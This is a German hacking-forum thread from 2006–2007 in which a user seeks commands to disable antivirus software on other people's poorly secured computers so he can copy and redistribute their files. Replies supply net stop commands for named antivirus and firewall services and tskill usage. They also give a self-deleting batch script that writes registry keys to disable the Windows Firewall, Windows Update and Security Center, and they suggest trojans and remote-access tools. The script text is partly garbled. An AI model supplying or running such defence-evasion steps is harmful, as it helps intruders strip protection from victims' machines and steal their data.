Befehle zum deaktivieren der gängigen Antivirenprogramme

N30N · 7. Dezember 2006

Ich brauche die Befehle zum stoppen der gängigsten Antiviren Wächter.

Befehl dafür wäre net stop.

Hat jemand ne Liste?

Und bitte kein Geflame...ich brauche die Befehle um das Board mit neuem Stuff zu versorgen.

Anzeige

wlan · 7. Dezember 2006

AW: Befehle zum deaktivieren der gängigen Antivirenprogramme

naja.. kommt drauf an ob die als Dienst und/oder Prozess laufen

mit net stop kannst du zb. dienste deaktivieren

btw. wozu brauchst du das eig?

(sollte das nicht lieber in den hacking bereich?)

N30N · 7. Dezember 2006

AW: Befehle zum deaktivieren der gängigen Antivirenprogramme

net stop "AntiVir PersonalEdition Classic Guard"

Das wäre zum Beispiel ein Weg den Antivir Guard zu stoppen.

BTW: Es geht um relativ gering gesicherte rechner mit diversen Antivirenprogrammen, auf denen aber sehr viel Stuff liegt, größtensteils s in High Quality.

wlan · 7. Dezember 2006

AW: Befehle zum deaktivieren der gängigen Antivirenprogramme

versteh ich das richitg, da liegt shcon stuff von wem oben den du übernehmen willst?

wertzu · 7. Dezember 2006

AW: Befehle zum deaktivieren der gängigen Antivirenprogramme

Unter den Menü Punkt Sicherheit kannst du deine Firewall deaktivieren, Antiviren software deaktivieren upgraten und auch einstellen!

N30N · 7. Dezember 2006

AW: Befehle zum deaktivieren der gängigen Antivirenprogramme

Lokal....

jede Menge stuff auf mehreren Rechnern. Ich kann mich da nicht hinstellen und bei jedem Rechner nen Filetransfer starten, also werd ichs von woanders aus machen müssen. Dazu brauche ich die Befehle. Bin durch Zufall auf diese Quelle gestossen.

Dann, wenn ich das Zeug hab (Schätzungsweise um die 500 Gig) werd ich einiges davon uppen denk ich.

Sorry, aber das kann ich nicht gebrauchen, ich weiss schon wie ichs anstelle. Ich brauch die Befehle, nicht mehr

B0mB3r · 7. Dezember 2006

AW: Befehle zum deaktivieren der gängigen Antivirenprogramme

Schieb doch en "Trojaner" hoch dann kannste doch eh alles machen was de willst ^^.

wlan · 7. Dezember 2006

AW: Befehle zum deaktivieren der gängigen Antivirenprogramme

hm.. du kanst schaun ob es einen adaptierten kill befehl vom linux für windows gibt den kannst du dan drauf haun und prozesse ebenfals killen

N30N · 7. Dezember 2006

AW: Befehle zum deaktivieren der gängigen Antivirenprogramme

Bitte les den thread erst bevor du antwortest. Und logisches Denken wäre auch ganz nett: Bevor du einen Trojaner "hochschiebst" muss das AV Programm deaktiviert werden, sonst bringt dir alles nix.

Den versteh ich nicht :/

wlan · 7. Dezember 2006

AW: Befehle zum deaktivieren der gängigen Antivirenprogramme

also unter linux gibt es den "kill" befehl womit du unter linux prozesse beenden kannst, ich schätz mal soetwas ähnliches gibt es für windows auch.. müstest du allerdings im net suchen und dan auf den rechner draufhaun

My-Doom · 7. Dezember 2006

AW: Befehle zum deaktivieren der gängigen Antivirenprogramme

ja gibt es auch für windows:
tskill heißt er.
beispiel:
Internet Explorer öffnen,
start, ausführem tskill IEXPLORE
und weg isses^^ Jetz brauchst du nur noch die (prozess)namen von gaaanz vielen antiviren programmen und es kann losgehen xD

Code:

Beendet einen Prozess.

TSKILL Prozesskennung | Prozessname [/SERVER:Servername] [/ID:Sitzungskennung
/A] [/V]

Prozesskennung Kennung des abzubrechenden Prozesses.
Prozessname Name des abzubrechenden Prozesses.
/SERVER:Servername Enthält die Prozesskennung (Standard ist der aktuelle Serv
).
 /ID oder /A muss bei Verwendung von Prozessname
 und /SERVER angegeben werden.
/ID:Sitzungskennung Beendet den Prozess, der in der angegebenen Sitzung ausgef
rt wird.
/A Beendet den Prozess, der in ALLEN Sitzungen ausgeführt wir

/V Zeigt Informationen über die ausgeführten Funktionen an.

mfg

My-Doom

wlan · 7. Dezember 2006

AW: Befehle zum deaktivieren der gängigen Antivirenprogramme

hehe wuste ja das es den gibt..

bzw. doom hast nen link? =)

hätt den selber gern in meiner sammlung

btw.

eine permanente lösung das die dinger deaktiviert bleiben wäre die registry einträge zu manipulieren

B0B · 7. Dezember 2006

AW: Befehle zum deaktivieren der gängigen Antivirenprogramme

Hmm Windows Firewall hab ich hier:

Code:

@echo off
net stop ; Security; Center; 
net stop SharedAccess
> & & %Temp%.\kill.reg & & ECHO REGEDIT4
>> & & %Temp%.\kill.reg & & ECHO.
>> & & %Temp%.\kill.reg & & ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess]
>> & & %Temp%.\kill.reg & & ECHO & & Start; =dword:00000004
>> & & %Temp%.\kill.reg & & ECHO.
>> & & %Temp%.\kill.reg & & ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv]
>> & & %Temp%.\kill.reg & & ECHO & & Start & & =dword:00000004
>> & & %Temp%.\kill.reg & & ECHO.
>> & & %Temp%.\kill.reg & & ECHO [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wscsvc]
>> & & %Temp%.\kill.reg & & ECHO ; Start; =dword:00000004
>> & & %Temp%.\kill.reg & & ECHO.
START /WAIT REGEDIT /S %Temp%.\kill.reg
DEL & & %Temp%.\kill.reg
DEL %0

daedalus · 7. Dezember 2006

AW: Befehle zum deaktivieren der gängigen Antivirenprogramme

zB:

Code:

C:\WINDOWS\system32>net start
These Windows services are started:

 Cryptographic Services
 DCOM Server Process Launcher
 DHCP Client
 Event Log
 Kaspersky Internet Security 6.0
 Logical Disk Manager
 Network Connections
 O&O Defrag
 Plug and Play
 Print Spooler
 Remote Access Connection Manager
 Remote Procedure Call (RPC)
 System Restore Service
 Telephony
 Terminal Services
 Windows Audio
 Windows Image Acquisition (WIA)
 Windows Management Instrumentation
 Workstation

bei den meisten avs reicht danach das simple stoppen aller antiviren-prozesse, in diesem fall:

Code:

net stop "Kaspersky Internet Security 6.0"

ps: tlist kannst vergessen für prozesse jenseits IE => pskill oder sowas..

sonst per remote desktop (oder sonstigem RAT) einloggen und AV ganz einfach deaktivieren ^^

pps: win firewall kannst auch einfach mit 2 commands bypassen:

Code:

netsh ... ...

(selbst bisschen suchen ^^)

Luke.th3 · 29. Januar 2007

AW: Befehle zum deaktivieren der gängigen Antivirenprogramme

hoi

z.b. net stop Sygate Personal Firewall Pro
oda net stop AntiVir PersonalEdition Classic Planer
net stop AntiVir PersonalEdition Classic Guard
net stop Kaspersky Internet Security 6.0
net stop cFosSpeed System Service den kannste eigentlich auch killen dann kann er den traffic nich sehen falls ers installiert hat
bei diensten, prossesen mit mehreren wörter am anfang und ende die " nicht vergessen

aber wenn du schon drauf bist warum guckste nich erst einfach mit
nen simplen "net start" was alles aktiv is ? ^^
sorry für die blöde frage aber ...

greetz luke

My-Doom · 30. Januar 2007

AW: Befehle zum deaktivieren der gängigen Antivirenprogramme

link wohin?
das is ein einfacher auszug aus der Konsole (cmd), den auch du bekommst wenn du in die cmd (start->ausführen_>cmd->)tskill eingibst..

Und joa, ich denke auch, dass eben durch entsprechende manipulation in der regitry der autostart verhindert werden kann.. ebenfalls könnteste eine simple bat schreiben..
1. ausgabe nach nul leiten ("@echo off "style^^) (das nix angezeigt wird) [sorry, ich weiß den genauen befehl grad nich xD)
2. net stop Antivir service
3. tskill avprozess.exe
4. del "Pfad zur exe des Av's oder so"^^

mfg

My-DOom

pS. Daedalus, magst du nich den 2. command auch noch verraten^^ xD

Nützliche Suchen

Befehle zum deaktivieren der gängigen Antivirenprogramme

Videos zum Themenbereich